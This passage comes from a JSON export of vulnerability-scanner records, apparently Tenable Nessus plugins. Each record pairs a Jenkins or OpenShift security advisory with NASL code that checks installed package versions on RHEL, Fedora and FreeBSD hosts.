reference:\"openshift-enterprise-yum-validator-2.2.9-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-cartridge-cron-1.25.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-cartridge-haproxy-1.31.5.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-cartridge-mysql-1.31.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-cartridge-php-1.35.3.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", 
reference:\"openshift-origin-cartridge-python-1.34.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-msg-node-mcollective-1.30.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-node-proxy-1.26.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"openshift-origin-node-util-1.38.6.2-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-bcmath-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-debuginfo-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-devel-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-fpm-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-imap-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-intl-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-mbstring-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-process-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rubygem-openshift-origin-common-1.29.5.2-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rubygem-openshift-origin-frontend-apache-vhost-0.13.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rubygem-openshift-origin-node-1.38.5.3-1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"activemq-client / jenkins / openshift-enterprise-release / etc\");\n }\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-11-01T02:27:24", "bulletinFamily": "scanner", "description": "Security update, fixes: CVE-2015-5317 (SECURITY-153), CVE-2015-5319\n(SECURITY-173), CVE-2015-5324 (SECURITY-186), CVE-2015-5321\n(SECURITY-192), CVE-2015-5322 (SECURITY-195), CVE-2015-5323\n(SECURITY-200), CVE-2015-5326 (SECURITY-214)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-89468612F5.NASL", "href": "https://www.tenable.com/plugins/nessus/89311", "published": "2016-03-04T00:00:00", "title": "Fedora 22 : jenkins-1.609.3-4.fc22 (2015-89468612f5)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-89468612f5.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89311);\n script_version(\"$Revision: 2.1 $\");\n script_cvs_date(\"$Date: 2016/03/04 16:00:58 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-89468612f5\");\n\n script_name(english:\"Fedora 22 : jenkins-1.609.3-4.fc22 (2015-89468612f5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security update, fixes: CVE-2015-5317 (SECURITY-153), CVE-2015-5319\n(SECURITY-173), CVE-2015-5324 (SECURITY-186), CVE-2015-5321\n(SECURITY-192), CVE-2015-5322 (SECURITY-195), CVE-2015-5323\n(SECURITY-200), CVE-2015-5326 (SECURITY-214)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-December/174273.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?849631a4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"jenkins-1.609.3-4.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:37:13", "bulletinFamily": "scanner", "description": "Jenkins Security Advisory : Description SECURITY-95 / CVE-2015-7536\n(Stored XSS vulnerability through workspace files and archived\nartifacts) In certain configurations, low privilege users were able to\ncreate e.g. HTML files in workspaces and archived artifacts that could\nresult in XSS when accessed by other users. Jenkins now sends\nContent-Security-Policy headers that enable sandboxing and prohibit\nscript execution by default. SECURITY-225 / CVE-2015-7537 (CSRF\nvulnerability in some administrative actions) Several\nadministration/configuration related URLs could be accessed using GET,\nwhich allowed attackers to circumvent CSRF protection. SECURITY-233 /\nCVE-2015-7538 (CSRF protection ineffective) Malicious users were able\nto circumvent CSRF protection on any URL by sending specially crafted\nPOST requests. 
SECURITY-234 / CVE-2015-7539 (Jenkins plugin manager\nvulnerable to MITM attacks) While the Jenkins update site data is\ndigitally signed, and the signature verified by Jenkins, Jenkins did\nnot verify the provided SHA-1 checksums for the plugin files\nreferenced in the update site data. This enabled MITM attacks on the\nplugin manager, resulting in installation of attacker-provided\nplugins.", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_23AF04259EAC11E5B93700E0814CAB4E.NASL", "href": "https://www.tenable.com/plugins/nessus/87292", "published": "2015-12-10T00:00:00", "title": "FreeBSD : jenkins -- multiple vulnerabilities (23af0425-9eac-11e5-b937-00e0814cab4e)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87292);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/10 11:49:44\");\n\n script_name(english:\"FreeBSD : jenkins -- multiple vulnerabilities (23af0425-9eac-11e5-b937-00e0814cab4e)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jenkins Security Advisory : DescriptionSECURITY-95 / CVE-2015-7536\n(Stored XSS vulnerability through workspace files and archived\nartifacts) In certain configurations, low privilege users were able to\ncreate e.g. HTML files in workspaces and archived artifacts that could\nresult in XSS when accessed by other users. Jenkins now sends\nContent-Security-Policy headers that enables sandboxing and prohibits\nscript execution by default. SECURITY-225 / CVE-2015-7537 (CSRF\nvulnerability in some administrative actions) Several\nadministration/configuration related URLs could be accessed using GET,\nwhich allowed attackers to circumvent CSRF protection. SECURITY-233 /\nCVE-2015-7538 (CSRF protection ineffective) Malicious users were able\nto circumvent CSRF protection on any URL by sending specially crafted\nPOST requests. 
SECURITY-234 / CVE-2015-7539 (Jenkins plugin manager\nvulnerable to MITM attacks) While the Jenkins update site data is\ndigitally signed, and the signature verified by Jenkins, Jenkins did\nnot verify the provided SHA-1 checksums for the plugin files\nreferenced in the update site data. This enabled MITM attacks on the\nplugin manager, resulting in installation of attacker-provided\nplugins.\"\n );\n # https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-12-09\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7ce23a1d\"\n );\n # https://vuxml.freebsd.org/freebsd/23af0425-9eac-11e5-b937-00e0814cab4e.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b856ce9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins-lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"jenkins<=1.641\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"jenkins-lts<=1.625.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:25", "bulletinFamily": "scanner", "description": "Update to latest LTS release 1.625.3. This update fixes CVE-2015-7536,\nCVE-2015-7537, CVE-2015-7538, CVE-2015-7539.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-D7E5461DBF.NASL", "href": "https://www.tenable.com/plugins/nessus/89428", "published": "2016-03-04T00:00:00", "title": "Fedora 23 : jenkins-1.625.3-1.fc23 (2015-d7e5461dbf)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-d7e5461dbf.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89428);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2016/10/18 16:42:53 $\");\n\n script_cve_id(\"CVE-2015-7536\", \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_xref(name:\"FEDORA\", value:\"2015-d7e5461dbf\");\n\n script_name(english:\"Fedora 23 : jenkins-1.625.3-1.fc23 (2015-d7e5461dbf)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest LTS release 1.625.3. This update fixes CVE-2015-7536,\nCVE-2015-7537, CVE-2015-7538, CVE-2015-7539.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-January/174897.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ecfb9968\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"jenkins-1.625.3-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:25", "bulletinFamily": "scanner", "description": "Security update, fixes: CVE-2015-7536 (SECURITY-95), CVE-2015-7537\n(SECURITY-225), CVE-2015-7538 (SECURITY-233), CVE-2015-7539\n(SECURITY-234)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-938C70C840.NASL", "href": "https://www.tenable.com/plugins/nessus/89328", "published": "2016-03-04T00:00:00", "title": "Fedora 22 : jenkins-1.609.3-5.fc22 (2015-938c70c840)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-938c70c840.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89328);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2016/03/04 16:10:31 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-938c70c840\");\n\n script_name(english:\"Fedora 22 : jenkins-1.609.3-5.fc22 (2015-938c70c840)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security update, fixes: CVE-2015-7536 (SECURITY-95), CVE-2015-7537\n(SECURITY-225), CVE-2015-7538 (SECURITY-233), CVE-2015-7539\n(SECURITY-234)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-January/174917.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?10425b6e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"jenkins-1.609.3-5.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:25", "bulletinFamily": "scanner", "description": "Fix CVE-2015-5318, CVE-2015-5320, CVE-2015-5325, SECURITY-218\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-A433D8BA72.NASL", "href": "https://www.tenable.com/plugins/nessus/89353", "published": "2016-03-04T00:00:00", "title": "Fedora 22 : jenkins-1.609.3-3.fc22 / jenkins-remoting-2.53-1.fc22 (2015-a433d8ba72)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-a433d8ba72.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89353);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2016/03/04 16:10:31 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-a433d8ba72\");\n\n script_name(english:\"Fedora 22 : jenkins-1.609.3-3.fc22 / jenkins-remoting-2.53-1.fc22 (2015-a433d8ba72)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2015-5318, CVE-2015-5320, CVE-2015-5325, SECURITY-218\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-November/172686.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?51b600a0\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-November/172687.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?69e56c44\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins and / or jenkins-remoting packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", 
string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"jenkins-1.609.3-3.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"jenkins-remoting-2.53-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins / jenkins-remoting\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:21:05", "bulletinFamily": "scanner", "description": "Red Hat OpenShift Enterprise release 3.1.1 is now available with\nupdates to packages that fix several security issues, bugs and\nintroduce feature enhancements.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
